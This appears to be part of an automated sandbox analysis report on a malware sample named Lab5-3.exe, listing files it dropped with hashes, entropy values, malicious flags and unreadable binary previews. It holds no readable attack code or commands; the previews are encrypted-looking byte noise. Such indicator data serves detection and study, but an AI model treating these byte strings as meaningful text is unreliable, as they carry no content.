                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.930350646478377
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:glhtCodYg86A6OAIuneX39AeSk+GoaHfUTid3hBaUoSGFcmeykEdEElU92i:glhtCpv39lSkto1Gx0uKeY2ElUJ
                                                                                                          MD5:4AE0237C96FCC6BD5BC6F702594040CE
                                                                                                          SHA1:42EBFD5CC190AD0E44D7E0AFD03495E83C9F0424
                                                                                                          SHA-256:A810BCF21B23CB65AE1808741775E2C96F757BEF70262919A9B5F823AFA68891
                                                                                                          SHA-512:5F682980761597C7BE0E2C1DBB3CD08A5EB36A815227A26EEA7DBEE0D23E3D22BF673D07B898777BC088C9787EF90BB76966729E78CE0032D51A3F39E32C39D3
                                                                                                          Malicious:false
                                                                                                          Preview:/.p.p(.\G.$j)..v...<;.S..r....M.:.0..r.B...B<.k.=.v..y4...Y...........C.lr.$.$Y,U...p].`S.sb.9..4a._..cBc-2..W3`~..-.J.U..bpS...J.a....W....a.^....f.%n....F.A.q.>.....?.Y}3......g...b..@..3.%b.We.eL....p.&Df5.jc4..Y..".un.....H1.M..t.G.l..f%C...{^.px.e....ld9....e.0q..]..<v.../.vK.[.@e.e.j..0.G..g....X...Uh"..=.lW....&...K....M@*a..>3................?..:......].>.-.H}.7.Hw..g..o<m.p...$NB.....MMH.N......,.B.O.........m.+..|.p...x.e..J Vk.....#.....K.L}..I..A..h.....!..a.P..F..c....//.jh..9.T.N_h.p..P.L.?z..S.F.....;+.".?..AK....T./..I.#.-.t.Y...q..S{e.?p;^.<....I:....V\eS.$..$...F.0....J*4.V....E.H.2..g.2........ch.....H......W./..W.C...C.....,.M.r.d...'.........r|t...g.+..>.t@.|.p.-n.Y.pq.8.Q..<...z.R.&.S..S<.=.>......n...sd...xI...>D.w#.!.{.]).....T.>.WP.E.5.Q..d..NT...<.e.l.75...>+.COz)..~X.=...Sv..o7....F.L...gi.S..ejM.}..`..^]..w$J..R>.5......H~..Bw..3.....-m.q....1.4a....b.j>q...!.S.[Z..F.;_....V,/5!.3..s..<.....F.[L1..oX..".E.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.936301851798078
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ri/UfLRjgSl6MKLZYmc+54W34OAqIUW06qqcHkSWfpBIaHfUTid3hBaUoSGFcmeR:G8fLRjgSlOLLc+2W1AqGNYYOGx0uKeYO
                                                                                                          MD5:E239C47D43B7F6406C7FE5677ECBDC48
                                                                                                          SHA1:14CB8EC29E783A5F049DF49ECCBB1197456387D8
                                                                                                          SHA-256:E0C898B091BD2488D72BAE25269D618514A5D369F81CFBDE6ECB26A54ACDE29A
                                                                                                          SHA-512:2481DFAE3B8596DC50C35D2070808EA35C8EE31AB214A10D56FE6D88902303339A3D896025B6679268D2F94871AB49318EC0233D327751018FF7D8F4F21D2C38
                                                                                                          Malicious:false
                                                                                                          Preview:........R.y...}...g..!.Kf&#.7...}^.J..cv.B<.9zm2iGOT\....Y.v..f...|.tO...U`}..\<.............A(.....+..oh.\.S.>7..5z..g[zd..vvd.W.N.^.bcOsG9..U.h...,o.hIV.HX.....K.EI.b,a.....P...1G...A..D..Sn.a.Y..............c...,..^. ..^v.'.S(.a..R.c.6M....p..t.z.0....~*.Y..d.M,..^...._H~.7..{z6.L..k.C.o..*.P.v..9T..,.....g.e......tV.d..ir!=O...EV...L......3[.Ld.........E..<.s.4...v`..H....rcg..D3...X.w.#[n.}#VrPI.4.......[.........M......?Aw..<.s.....~.....Oxo........LYC...^_....(d?..6l8}..j.fn..P.{9.]..rj.{.(.5..K...+..[,nH...4F...GW.4i..h.GQG..z.F.u....XD....~......<pw....Z..e..cU..._g.!...C.I.....X...{(.<s2...D..N.:xg...hF._94....-..X......f..8.1+....Hh....L...A.h..C-.=....).R..v.S..I.=..p.........W.+..AR[4y&Z.3.S..bW..t....%....>B..(X.4.cD...&..@K.. ...T..$..9].u@'pVVC........9U.Y.cg.*....}..{...@.....C.......6.!y..B...k\F.}#Z?......+._.v...F{....j`T.%..W.C.4.N.SE......"V...e....W.....|.9.t.r^.L.......Z....^U..|./-.....#..x......0..#(..$..s._.\...R.T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.92280205157927
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Fuk1nH8FEl1JNov6/3+gtHfUTid3hBaUoSGFcmeykEdEElU92i:ksxlDUu3RGGx0uKeY2ElUJ
                                                                                                          MD5:378989D6153A46226B5440AD85EB8F01
                                                                                                          SHA1:4CC2254DF4B2F05E964D58C2C0D2E0A895525AB6
                                                                                                          SHA-256:1C81B58232F20DA0AA953BA9485FC44B36D52F207976CE672D929DD01A80AE60
                                                                                                          SHA-512:06BA5AAE0C10FCED9CA61CD77F2ED18BD0F4DA090910604FCD9FDE74B0BA710FA3F94A06FB67ED90B3CEB5BE49DFCD50670E22A817B7773ACBB290A9A02B79D9
                                                                                                          Malicious:false
                                                                                                          Preview:b......zn%;..K.w8.1*V.]q2..2....LAs.0.5.......q..R!....4&R...)=.q.........ou. ....]E..b.1D.F....q.._.(..FkvslmT....\.%...La.s..;...Z..M..h..48. $..Z....gc/....odY-.S"......X..C.G.....QJ....i`.?b..o.?'%_Z..Lj....=^.mH.......".. ....c-)W........&t(.#,7..l.y....'.AT.....q..U.;I.E0...........SH..v..#...j...U...4......^....4.$.y...(.~=...*.....u3:....x|...^s.q/}.}...-s0....5F..Vz~.$...%.B .v.i".j...3......C..J....m.2.%..Qx.......r.@.....|.._h..m...D....5..'].<a...13"."...N.$s...a0..$...lr......y._.1...T7..^.......}..a...o..E.1.[.Y\.]s.GV.!.3.....A5..5[X....p.m\!......&2T..U..K#.V......=.L...[.V3u.Gt.#|4:S.{s....-To..Ec.[.}..d.R..w.<..D..l..wr.J.?...H_.P..$,<...p m....=%..d.b&Y.f.=.Y>..{.?.=...j.|J...2..:_x..}....d....2~.W^.....i..-n.5.>...R.....7./C.+[1......P.-..S:=>.~...?K.5$.....h5.....h.....;S.o....,.E.!,......mv...,..@...'...m...'X.E..y2.)..g...A.Fs(F....$..N,.=.%.vM.d....0.eH/..'.]b...........z...[] ;.....|:PaQ..8_@...;.S%y_VQ....an.<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.9198116571465915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DIYFIvx0NLFvwi2XsWujSQQsCVlHfUTid3hBaUoSGFcmeykEdEElU92i:DIUI0NZvGsVSQQsg+Gx0uKeY2ElUJ
                                                                                                          MD5:F9CAA0BD8C5209865F5D5F805BF75FB3
                                                                                                          SHA1:AE62B51A28C8ACF8F77A87CEB0FF80C5FBF55FD0
                                                                                                          SHA-256:B9D31B89EDF922BF64947D6FC243E7451E408A3E0903DDA97273FA6465849467
                                                                                                          SHA-512:B469F840E6D7971388AAD3AAAD21D771DC194AE2FB469579F47B2B932589D7C0D7974F699C7D1FB1CA5138EA353BE336E1272DC9C43DBB541369A64261A60F73
                                                                                                          Malicious:false
                                                                                                          Preview:......ZEqU..x.."..Y........q...@.mT.^X}tGA.Z.1.9..&..xX.e..m.N...Xk.....NiX...0.>..)k.._..t..B......mg.O..lJ..5....e....D...[.b..D*.P....hF..U...Jcy..f.Oj.._.Km......m.4....;....L..t.........Z..n1..M.......Q.}....P...J.......u)5O.V..3.|..A,.;<...8.'.G..X(......f....'.6S..N. .Yf`....m...v;.|&....Y=.*...p...X....."..../..;O#.....OO....RQj.....%:.6..r....&.}j.H8..y......._....9.. .4..+.M.y..P..>s..E.....,H..8..W.^g.|.:*...0.._G.B..Q-.F.....rx?.[#.8..L&^#e_M...Y....'Cr.g.....F.......58;..#.j...jl.....a..p`=..s..H;.u*..0+..mj..G.l...N...B.4....R%.{2.Q..:.h..(....4.....-....UIE.Z.u%.}......~...m.;.....<..J..Q.W.....4HF.ur.h.5.N`....4..\..(V...z..........A.......{..,..:f..T...6Q...?B.n../...bb.x+;.S.Cm...#..W.,......$.Z.X-'PXq.1QA....~q..SW'...)T.y..{zB.R|%+.t.V....M.L^\).%.G.....J~..3...J.Q>G...@..Vo...bol.G.fnK%.j............... ..7.ji)...........i..+....5a........<^..~.....UK...R.I)#...;....3n..V..o`...7e.l.?#...f./.f...H..M.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.924153867823814
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Xf7SM8PlaJqr7pz/1WBzr77VHfUTid3hBaUoSGFcmeykEdEElU92i:XfGFtYqrlzNWhr77uGx0uKeY2ElUJ
                                                                                                          MD5:0E054C37A20C49F930B57FD10DDEB70D
                                                                                                          SHA1:CDB1DB68BE68FC294D65C408FC56D0802EA49051
                                                                                                          SHA-256:DB8A8D4E701E0839734AF0F82CCC1CB5A88C9469F72E3A7C0D3873872D3CFFD7
                                                                                                          SHA-512:32B1EC15634556D94697DEE15E86D372D959D874F8EA0CA675BED3EDC3CD7DB27E358717ADB8E727CF6C148F9520BDDB017E0623D04A303DE0B42EC55265F360
                                                                                                          Malicious:false
                                                                                                          Preview: .1z...;PeY..Nj...9..=y.8..{..._~...$U.....E<.....j.i.LP....j......:{...%.(..h.3.?Rag.).u......f.D..<lG.....I....uM...h1.{@.....Y.....9{.....H(.W.kI5~..i..c.~..M9p....c..aS....qm...Cs...}.!.cYE?=..E...W...6.V.@..wu;....3.+..Z.T@a... ..."T....F.n3W..a.@zQk............Q.`.0..$....,U.".'..~).|'{...oA....y..`|....G....%..|..^...<.b.F..$.....P...`....._...p.=A.........R..PC.\g".6..FrU....._._.....$.../..?.(..iW^ !.~..-,7.tIF.<.V^).m.B.#Gf.......@..."4D.%^v2.ZR.......o \D.....noz.Ld...9G.$.6.......yg...=4.q..O..:.O.#......'.P.FK..:....../.P+.]...^.y.1..hV....?.S.D...?.....s...........j.....;.....qa...q..,...Q.E..1...L]-<._...G/..k.e..."h...da..w..9...IQ.U..].M.j...6FC`.I..*...H..@.Z9u..`...S.wGA....2#.Q..3.(.R8&c\..M..S*......I^%......[S....?/....`.......B...5F...U%....Q.>...S|....S.....24%...9..^3....'...B..bQE..Z:......oTs.P......=..".b......C.AY....z.h..*.0.w.&.k..5...t........f.z=Q.:..B..._.*.!......u.d.2.3g..X..+...O...@..?..si.9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3872
                                                                                                          Entropy (8bit):7.950061544433325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dlOm1o2AIfbXvbPmNv41V/gQX/q8sGx0uKeY2ElUJ:d51o2xjPmNv4gQP/0Cb
                                                                                                          MD5:8428F225627092C92025C20EFEBC07E1
                                                                                                          SHA1:D6A26572387BE567201A322997C23794DBD762A6
                                                                                                          SHA-256:520C9CD16DD98AB8B388A1E1684836B3F7C7336C40A07F40EC47D441F7BDC63A
                                                                                                          SHA-512:B9D8A066FF50A37B881375DDED1BCD26AEF3DA9568C1E761510F0936A5FE5F94194C5BCEAD568ABDD4CB8C40FBCDF4112F6044A7B6D443BCB1CA95316C6BA3B3
                                                                                                          Malicious:false
                                                                                                          Preview:..0B........i8..h...=./.d..<$.J...r..........R.*......p.rk..3.~.^.V##./....E...a...........3q..xO....c.:.&.[.g&.?......./7.V.Kh..:.h..,........\.hU.Y.....x..:....Gh.....}/..9f..O..;...MU..Q3.....>.....4..,.,.....[Tk...^w..M...l..Sg..y...!.+>T..5..V...2%".Z.....v.p.}O.......9@X..5.!Z..cr1.|..F,2L$......u...p[...Z.Q.M.wX.UwR+..).....N/..O...g.. #C.pL.V_ 2....|.r...-\TB....Y....].*.p~..q}.1G...u.7.............x......:v..y2.M...iU..aD;tn..+B..-..z.!..-..[.&..E...W.`R..... ...x4....;..7........lx.!..S.F...HZQ\D.........\~.p.jw.\..e.B0..s.O.RU.*..F.ch/..."Hh..$.:...K..<..Z.....py~kh..z...8.j`P(.......R..<."....c5..km3.9V.f........I..8..s.......>h.Yt.47..G.5..A...2..n....z..FHi....&..lJ.2.F.z..G@..$.H..."..!p...^.v.V...P@...._.~"M..N.8...4.....12b.V-.Q.'[.......oP..z.\BGRJ.}...U...f./,]a\"..QN&...'.../.4....6..?.ab.>..?....t.).z..].......ny..lC.....G.t..i...c..a..l...Af:...qx......J...v.v..D.{..~S.W..|x.......(-..]]......._....z.....v..O...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.917935470999557
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:180PzhxLmx7b6tZ1PcSRrC+osIcZwgHfUTid3hBaUoSGFcmeykEdEElU92i:18W6kny3SI7nGx0uKeY2ElUJ
                                                                                                          MD5:5FF40E59C5DB258F97629C6B2506FF83
                                                                                                          SHA1:F58406D586445D0C607888372B27460F51D4A32E
                                                                                                          SHA-256:38936F20F08495993B68E79570BB5A24956B21CA5B08E2A7857CDB0F85C082D8
                                                                                                          SHA-512:477ACF3D1C8A46253B9D87C83FF09D773E8BDEEAFD35AC7CFEBB170B6F28C0C42808907FAF2718C49F308ABF169B0A0489CA1C958DB98361AA0CE4CC1E0B5C28
                                                                                                          Malicious:false
                                                                                                          Preview:..xQ.. .s..[.$...(.M...o..~..;.&.@..n...-4.{.$U..YzN..[..r.>......P.6.......-......z..).^...>..#g.>..|...IR.3....[.)Q.f./...w.\.....JT3..Y..V.f.J.@R..F.....v&?.a.Be.l..:]+.`..H4.Pk..T_..Y.$R.f&.a....C?vd.....B..R2.B..^(.......#d......|......5...H.O.)C!.f.GEe.c...8.37.Q......r....L.wi.. ....}..s...=...Z....9...)......M!.....^.2l..!K..Z.f..l...j.j..(..I:.5.d.M..p.-..I.=..)S....V6...F....p,...".....G.M.5.R.c_-.8.@..f.<2{..t.&fu_....{ (.H-.p..5._...c.,U...c..l....&.;RG1....X.C...`.7a_. .u...:..R..".......(D...6....78$...0.c....$OuUa...x....N..~....E.>...Z.c..;....(Y..j.....e..*.O.:n......3...y.........+.....@..O.Y_"*...z...3.H{'.&W...M.y.^W$...g..r.`R....I..|.....^<e...}C..K.MP.j"1..B.[^....Z......T2..Y)M1-a....7..u......p.e..gC...G..+"...)....6..1.;,.+.......<.H..u...>.8....N......2#......."@..9.KH..R..........?4.7.=.).e....t;.....j.t..../A..._S,..".V.iD.z.....cN....C.cwz&.Vb.V,....[C,Q.....Z.cH..'O...B..........x%..P?..R`{..G...+..%..RK...5n.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3680
                                                                                                          Entropy (8bit):7.9536862628275395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hFT/Sps/G3TOtGwhyHsftO//pGx0uKeY2ElUJ:hFT/SeQTOsbMftB0Cb
                                                                                                          MD5:26609F9B49A65DCDEF55B4C3F0B2943C
                                                                                                          SHA1:1246737833B9A58FF5CFD3CA31C6ED1D64211854
                                                                                                          SHA-256:0675CDAF5BC601ADFBF4A48B6525295E745E51E2A4A1C8A84EE14F69B0B300A0
                                                                                                          SHA-512:C3817BD06AB6B164531122DC6B4C3E2870051D042A6C71F9EC7F5B1DE1A25C188D3BFFFE2AD94A18D7AA6A36B78EB6DF2815323E63C014F40313639E49710461
                                                                                                          Malicious:false
                                                                                                          Preview:..S....s..0dZ.l>..M:d.....".~.Bk...M.......}.v.....v..O..>HIv Y8../.`m...b.H...[....#o..@s........Y.....]?.1.oE.=.n.. K..n....X.a#..n..d........%....N....2-,.W...p..K+.<.uJ.P...r..Y.Uz.4.r..D.... 6..Y........[y.)..U.cbSR......w%* ...9.|.m.w."..L.......+.K..O....X.,.P..........v33...\.q.>.yS.="..9N.....s=.i.2..$`.[9......H.s "..!Fp/,...F...h]...*'.X%..^.;.T.....@.d.\f`&....F.pE..c...Z..W...@.Q......N..7.&....).+..#.s..<Ks..O.xo.....=,=...yy.N.z...l....X....'.........7..iR.&j.j.k.s@.......C..2E.....K).)..^L...V~Q..7.$.{".E.h..X../$f..&s...B.H#......$H........&.c..y..;....^/&........[.b.d#..~..?.HH...^.\J.x......eB.C.........J.........Y?.BN;.".\.M..~U.V'}uX...A......G....8^..-...e24>..!@...4.H.s....s1..P..0...8N$..|b....0M\.8...G.C.......i.;.!s<i.&y.....>.&..>.v9....]Y.gN.L.`..i.!$._Tt..:.d.P.0......".(.:.r...-.SC.T.....F.#L|+.. E.t.{).2.8.#17..S1.e.(Z.....g....F9.Pwh..G.#``J.I'.'...!.j....L\.;l"2.|..V.G..D.(.})D._.L...0zXU$g......5..4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14240
                                                                                                          Entropy (8bit):7.986625799689279
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:P3e2flQZm5tjbfcY011MjvHs6ocQDm3ElQxWESMNjeJchdri7zFtMYC0Cb:G2flQG/B0/sHbAmoQx3SMNjCchkvTCtb
                                                                                                          MD5:192390A35B5DE3110C3CF44AAE671D9F
                                                                                                          SHA1:46F19230B2EF0003D4E954170D1FBB57467474BC
                                                                                                          SHA-256:94D7BAF049FEBE4EDD7642FEF2CF4CABC295590518E44AB6BAF2B7AD512617EB
                                                                                                          SHA-512:343D0FC4CDE86DC2EE21311433E3D6DC46171D42D727F15006B7CFD826E2C88C6B4F98EF39BAB7873AA429892D3DE6657353D86487E35BCE948CFBDB9C8387D4
                                                                                                          Malicious:false
                                                                                                          Preview:.E....S....;s.L..Rr.O{.p.........A%K..W..;.....T..v8wt.&.p.......d.....RfaBH.I.z.H}....[....<.C..k.....meA.....VV2..n.m.:~.C..6.[...,{......$.x.....2...'..R......;x[.....t......O.B.2.%...R.4.<Pf(...r>E;.'=.."d$...;k^.....)9..E.4..X..O.G......VXh$....i.........O,..?.=qR....1.JO;T..J0..`P.K.2JI.........6.....|.5..?.i....v.{.....'I..M..%.~. V.....I....F...3WJ.&....L.V.dcl.v..........Z..wQ.@...A.6....v^...?..0..U.3'.u).&.RX..1.v.Z..&C.....a8..}].f"!.q.U.. @.(..K.5..$. .......&D.0v-..E.`.o.f]z..1.f.E...7......\z.......".W..t.... G.Z..x.b..... y.N....C[......j.jV..+;..W.,_.`.Fi.'....xx..Zy.E:g.....qD.,.Dk.N..3.U..Abi76Q....>C.....0..+...rqo7&<w..WDTD~<./....6.....>..:$J..TyHT.8...u.#.......e-"[..F...).R120...T."=`j!y.....0....x1.W...8...$..{.k...$.....c....j............>.{.^."HR_....E...:..W~J..%..z..G....z.I...3.{..#<..S1...YL...4h..=...JD..^..-.........;V.]...9;.m>..#~.NR....'",/.....C....x\.p.6..o.N~..f..s.......<@.:Vk.=.K.H%.2.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1872
                                                                                                          Entropy (8bit):7.897401527418739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KkO2C2woPwKalF2HfUTid3hBaUoSGFcmeykEdEElU92i:KqoK8JGx0uKeY2ElUJ
                                                                                                          MD5:3B8C994F25F1FE38D9F780EA551FB3B4
                                                                                                          SHA1:8000D838D08E19D139656FBC29141B8211EF9488
                                                                                                          SHA-256:D5ED604DAEBC9A37A9086C04C9A3E24703D653A5728ED4C3EFAC839E7AE4530F
                                                                                                          SHA-512:872263402097DDC7E25A3B5A02E20B4B2ED911CB372BA70AE653828363C0D111DB80E6199034924593A3402F00E10CCEA6702D76A9F9BF146A847EABCF42BDDD
                                                                                                          Malicious:false
                                                                                                          Preview:..n....{....w|.....G"..p=F|.3..Q.v...\...f .F..s>H.V..~.,.....Z.k/_...........:.U@).4...'.E;..L.?b.l.O....O.L....%..)n.r.l.....S...........Jd...A...#3......6...5he..R.Br..i6.AR/.XX@"...6..8g...e..+B....j..>....].V.+T.TW..v,.....G/.D^..p.3........\E...L7p..r2Jg.!B.X{..D.O..... ..N#n.c<>.Ka.....=..3../.1.a.f....C..]..k6&^....X.q!q..L.%......h.V..h...Qq...GL....*."=.c..Q .3...Ys:4..pr................~.JX(...,6..^.O.Y..j..r....X.P?'..w..eV.sO....I%.....1.E..iX...:h.1v.M.t{.q.....jh...X.pA..(..l..9....._GT..P".Q.y.td........R..Dm.....PzA.mk.....J....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4304
                                                                                                          Entropy (8bit):7.9556254656385645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ZHZlulAhg5ozVi4RYBtggglX9onic6YGx0uKeY2ElUJ:ZmqhmmQrzgZX9E6b0Cb
                                                                                                          MD5:7A1ED019A4DCAF526E145943DEBFED2A
                                                                                                          SHA1:04CD63D17BB8CC80CA79EB4FF9D857D3730B102C
                                                                                                          SHA-256:3D1FAB103BA65A3C661730EA169745D2C95AAF0FE411BA4AEEDDE55268DED28D
                                                                                                          SHA-512:F868CAEF5AC6FC5762A7BFD136D8B97420CD7926CFEE6DA2296E8F6E85B38CA56A97D9813CEB233C723FAFC7FE10CEE9EFE9A91F04C597C37F0FA644563AC78A
                                                                                                          Malicious:false
                                                                                                          Preview:.4N.w.b.P....e=..|.. ....J.|...we.}.....R...!(.....2.....X.$.....;.0D.W.,...>]..c.-..%%Y...X..0Z..9Cx....L....U.U.d..5..rM ()<t:!._y.8as......>.~..;.F]....[..mzG{4!...=..w..M.<..X.R..ZF...7.....Qh..$.......a.n]I...p"Aj;".x..@.LQ:G5\..8..x...v.3r*.{J...Q..-.@...,.]8..l2...."/3..s3V.....qT/d..v....,..oe&&&..2w.R.....Z6....{}._).........R.-.%m...[qn..#.l....#....w......HJ.r..z..c.4....*...... lm.....Jv)K"............V9.L.BI$..`x..:...}.......K.p..6.c..#.......JZ..J.M^.9.....Q..y<..25..7..UWT.2>i$......%V&.......b..e.t..N......Y.^.&.t.....C..1..?....g...jp.Ett..}....[a.!.k......7..RY....yy....K.......oq..w*........j..........v..+..59....`...B._...~4....f)h8]nFr....[.....8g.D.4..:.K.@..Mr+....&....mr......1..?.Mb\s.e...97...x......V..A.a.R.H.Lq.......8.}7...X...+.....N.Z5)1..ij......mv.>C%.W..\..yw|....H.J.T..._.Bi.I../......??...<....nw........F3.vV.qK.F..u......t.....z..a.aAy...).+.qg..%@.a.F.6-%...P|.H.......1.A.wbq.&b..{`.=..............
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.933647468207721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uGoA7s5s82xIkcOrbM9ZVkISVCprjHfUTid3hBaUoSGFcmeykEdEElU92i:JeAj9WnSVgrwGx0uKeY2ElUJ
                                                                                                          MD5:95D1CA83E26D160D5B153A470BF3758D
                                                                                                          SHA1:5416CE7484E6C7C4D8E6DBCC0E14F7D685E7E4C6
                                                                                                          SHA-256:FBCA4E7769CFCC5C4A432AF04216FC8C7CE5AAFD2D6FE56DCD622D8C43E8B1A0
                                                                                                          SHA-512:0D2B60B7B14D87E283D50111BE0CD2C20272441F9BB8CC8055E6FFCB9FE4A5C998B4ACE02891935D16E26C15624C657ED195F913D0649C2CFE653F7C3A12F381
                                                                                                          Malicious:false
                                                                                                          Preview:h`j.A....T..I.#.....p..[.".F.5..}....U...............k}....E1s....Z...kZ]....1...xp...n?rvY..Z...C...]...._1(.....[^...k..S..p.{..<..8......f.Y.V.....P....P.Oj......6..bl.....j.F.}.(..GT..|9..SZ....HKSy.t.A7....Yk.4V#=n.#3*.@.E..~CYY....p..!W....2.q..v.....e...UAv....a....q4.0.E..|..#...^.}.DZ..5.)}Rq....UT.>..H..GC...jp.#r.\.1.......(..(.X...?.0...+l.E.......ZzI.k.j..A+#..J0.A.. ..|H..B..(U*$i.oE.G.$.....\.4=:6.zDk...U.c.+....W_.......K).Z...H...8.......d.....{....(9......R8.E...o0...=....3/q.B.4......C5.XJ.$i.[.yQ..{>.X..B.\3w....6.........7N.gM.}]^....Y_.H.....z4...N...e..#.X..v)O.e)..H5N'.DQ..,....w7C..q#.n..V.y...9&.t..d:....4..<.)..d..[&..l.xN.I.H.k$`SW.....v..'..$G.u.f$n+L'....Nk..".Kuj1.rZ..z.-....{......'g4.8.${.1.Y4o..T.Cq.{..|.b..N.D.^...9.`3.<Z..s;OX..S_!C..K[o..GJ.g..c..0\.5..N.4l."...BO'..Tm.w.p..V..zS..bm.....r&.-.4o..=...._?M9.7Lr]....C...d..............o..8u.......+...uSz...P..0.G..A3KV..a..TT..i.a.q.....m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30336
                                                                                                          Entropy (8bit):7.993001987407268
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:s/w+zvDBZe+RTFQljDf1nagDakfd49CvP+8pSGbLNe+1PBq/tFb0/Qji0iKsGazZ:s1VRYjFagDakfh2uSOLNnQ/jgIFNzKZ
                                                                                                          MD5:82B43E03624D0D4A8DE202D96B8A49F2
                                                                                                          SHA1:AB3DF958964B5D5593ED96881760EF1B84C2930A
                                                                                                          SHA-256:E06B91DEFB08B4D565F6790701E21F832CC90E963336402B9B758311D02A807B
                                                                                                          SHA-512:D82CE07414E6471472DB51FB9209B42A3B6CB69BD324AA19B4242221D0FFC8155ECBE86144426FB965388CAD49BA7A1635764956F999C3F4729AA9F4573665A0
                                                                                                          Malicious:true
                                                                                                          Preview:...(a.b.(ZH..F...........k.4K%..P...P9.w..."...s..r..G.:..c......6B..f.h......oX....mZ............vn.M.>'.5....R..m.3Nt.0....xmEM.....!kg.9}Q....+p0.............Z.....?&...KD.Z..........{..O_../....c.1../..3......$...z}t...4..c..n.-.2...y...5...).'.s.3]-....z..(f..1)TJOS.6d0.......p.;/.>.@.........*...=..1.......^W.n....0..s...y;I.D!.?...m..-.y..R.~^...'x...$..UY.=Z..FP..<3....&L%g..$....O1..c....."p...7.z.v..=....Xqj{....S.7.o..p.i:kK4..g..t....mR.p$ .1...UG..-.&...V..(..C..T..P.%..G.....x.s.=...+0$s.E..egp.b......b.Q..@.....S.s...Zr.._.l6.E.w........../C.%.|...n...+.....b.P.z.O...ndQ..U....(.E..../j.d....3......t..nI]....Q2t.R..e>.E......?........8..i.......p9. ._.S.I.M.cn.m....Pb....FN..[:$.....%Y...r.bcQ.H%.S.%O'./........]..M.J..W..,Oz.....Ah........P............n....l.^..Z<......}..^!.*.4.NW..;..{r.D.l.....5n.....p*.:....$.Wx...UXu1.*.f.M.T..T..+...W.. 6Ph.1..h..~....^A.0.....8.....K....G.@].G.$.c.\.K...F+G....D^..`E{...5....../O[6h.6..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66576
                                                                                                          Entropy (8bit):7.996829009444445
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:d0EeH/ymoIzOcUP/2A21uVgu3wattYZW/NX16T6I9OZ:d0HH/ym9OcUmA21uVztmW/N0OIUZ
                                                                                                          MD5:FBEE0948F0D9B57C3520D8845C6B0CB1
                                                                                                          SHA1:7914761C88AE25689F73329160BE96EF7738479D
                                                                                                          SHA-256:582D962E8661074C793E93F34FB7650CE75DB2F1D4E8DFE9BED05E7FCD3B2FA7
                                                                                                          SHA-512:E999444F7820554A6CA6A5D0422BED05679F4FEDD893B7B6F90EC492CF2D5B835CAC5E44CF6CB08AEE4D0869A00C4A770D52F7EDF0D551526B028BC0B456FF19
                                                                                                          Malicious:true
